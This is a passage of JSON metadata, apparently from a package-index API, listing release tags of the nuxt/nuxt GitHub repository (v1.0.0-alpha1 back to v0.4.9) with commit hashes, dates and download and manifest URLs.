","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","